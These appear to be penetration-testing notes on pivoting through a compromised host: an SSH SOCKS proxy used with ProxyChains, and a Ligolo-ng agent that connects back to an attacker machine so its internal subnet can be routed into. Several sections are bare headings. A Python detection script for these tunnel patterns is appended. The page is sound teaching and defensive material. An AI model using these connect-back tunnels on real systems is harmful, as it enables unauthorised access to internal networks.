Pivoting

You have access to a machine that has a second interface.

ProxyChains

We can use the following command to check the open ports in listening mode.

Then we can establish an SSH SOCKS proxy:

ssh -f -N -D 9050 -i pivot root@10.10.155.5

Component: Description

ssh: Secure Shell client, used to connect securely to another machine.

-f: Requests ssh to go into the background just before command execution. Useful for background tasks.

-N: Tells ssh not to execute any command on the remote host (used just for port forwarding).

-D 9050: Sets up a SOCKS proxy on local port 9050. This means your local apps can use this as a proxy to tunnel traffic through the SSH connection.

-i pivot: Specifies the private key file named pivot to use for authentication.

root@10.10.155.5: Connects as the root user to the host 10.10.155.5.

We need to edit the ProxyChains configuration file:

add the SOCKS port (9050) to the proxy list,

and also comment out the DNS line.

Now we can prefix our commands with proxychains to run them through the tunnel.

Sshuttle

Rpivot

Use this if we have access to a machine but do not have credentials. It requires Python 2 on both machines.

Start the server on Kali.

Now connect back to the server.

Now we can do our work through proxychains.

Chisel

Ligolo

Updated Tutorial

First, install it on Kali Linux:

sudo apt install ligolo-ng

You need the agent binary from the GitHub releases page:

https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_linux_amd64.tar.gz

Now uncompress it (the archive name must match the linux_amd64 file downloaded above):

tar -xvzf ligolo-ng_agent_0.8.2_linux_amd64.tar.gz

We can now use SCP to transfer the agent to the pivot host (replace the placeholders with your user and host):

scp agent <user>@<pivot-host>:/home/privilege

Before running the agent on the compromised host, you must set up the proxy on Kali.

The first step is to create the TUN interface for the kali user using the following commands:

sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up

This will create a new TUN interface named ligolo and bring it up. The TUN interface acts as a virtual network interface, allowing Ligolo-ng to route network traffic.

Now let's set up the proxy.

To start our proxy with the self-cert option, enter the following command:

ligolo-proxy -selfcert

Now we need to connect the agent back to the proxy.

Starting the agent is simple: start it from the folder you saved it to. If you're using Linux, ensure it's executable with chmod +x. Then, to start the agent and connect it to the Ligolo-ng proxy, run the following command:

./agent -connect 10.10.200.46:11601 -ignore-cert

Once the agent has joined, you’ll see a confirmation message on the proxy screen.

Tunnel Setup

Lastly, before interacting with the internal network, we must set up the tunnel and configure the route to establish a connection.

Let’s run the “session” command, choose our session, and hit enter to interact with our jumpbox (Ubuntu).

session

From here, we can run “ifconfig” to verify the network interfaces on the connected agent.

Our next step is to add an entry to the routing table so Ligolo can route traffic through the tunnel and reach the target network. To do this, we can use the command:

sudo ip route del 192.168.98.0/24
sudo ip route add 192.168.98.0/24 dev ligolo

Next, you’ll need to start the tunnel and go to the jump box, which you can do by simply entering “start.”

From here, you can run any tool from Kali to interact with the compromised internal network as if you were directly connected to it.
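A host-side check for the two tunnel shapes described on this page (an ssh -D SOCKS listener in the ProxyChains section, and a Ligolo agent session plus its TUN interface above), written as an added example for this page rather than code from ProxyChains or Ligolo-ng. It parses constructed samples in the shape of `ss -tnp` and `ip -o link` output; the ports, process names and interface name it keys on are the ones used on this page.

```python
import re

# Constructed sample in the shape of `ss -tnp` output (not real captured data),
# embedded so the check runs offline. Addresses and ports mirror this page's examples.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port   Process
LISTEN 0      128    127.0.0.1:9050      0.0.0.0:*           users:(("ssh",pid=4242,fd=5))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*           users:(("sshd",pid=811,fd=3))
ESTAB  0      0      10.10.155.5:43210   10.10.200.46:11601  users:(("agent",pid=5150,fd=7))
"""
# Constructed sample in the shape of `ip -o link` output.
SAMPLE_LINKS = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
3: ligolo: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN
"""

SOCKS_PORTS = {9050, 1080}      # local SOCKS ports: ssh -D 9050 on this page, proxychains default 1080
LIGOLO_PORT = 11601             # ligolo-ng proxy port as used on this page
SOCKET_RE = re.compile(
    r'^(LISTEN|ESTAB)\s+\S+\s+\S+\s+(\S+):(\d+)\s+(\S+):(\S+)\s+users:\(\("([^"]+)"')
LINK_RE = re.compile(r'^\d+:\s+([^:]+):\s+<([^>]*)>')

def pivot_sockets(ss_output):
    """Return human-readable findings for sockets that look like pivot tunnels."""
    findings = []
    for line in ss_output.splitlines():
        m = SOCKET_RE.match(line)
        if not m:
            continue
        state, laddr, lport, paddr, pport, proc = m.groups()
        if state == "LISTEN" and proc == "ssh" and int(lport) in SOCKS_PORTS:
            # An ssh *client* (not sshd) holding a listener is the -D dynamic-forward pattern.
            findings.append(f"ssh SOCKS listener on {laddr}:{lport} (ssh -D dynamic forward)")
        elif state == "ESTAB" and (pport == str(LIGOLO_PORT) or proc == "agent"):
            # Outbound session from a process named 'agent' or to the ligolo proxy port.
            findings.append(f"ligolo-style agent connection {laddr}:{lport} -> {paddr}:{pport} ({proc})")
    return findings

def tun_interfaces(ip_link_output):
    """Names of POINTOPOINT+NOARP links, the flags a TUN interface such as 'ligolo' carries."""
    names = []
    for line in ip_link_output.splitlines():
        m = LINK_RE.match(line)
        if m:
            flags = set(m.group(2).split(","))
            if {"POINTOPOINT", "NOARP"} <= flags:
                names.append(m.group(1))
    return names
```

On a live host, feed the real output of `ss -tnp` and `ip -o link` to the two functions; the constants are the page's values and should be widened to whatever ports and interface names your environment treats as suspicious.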
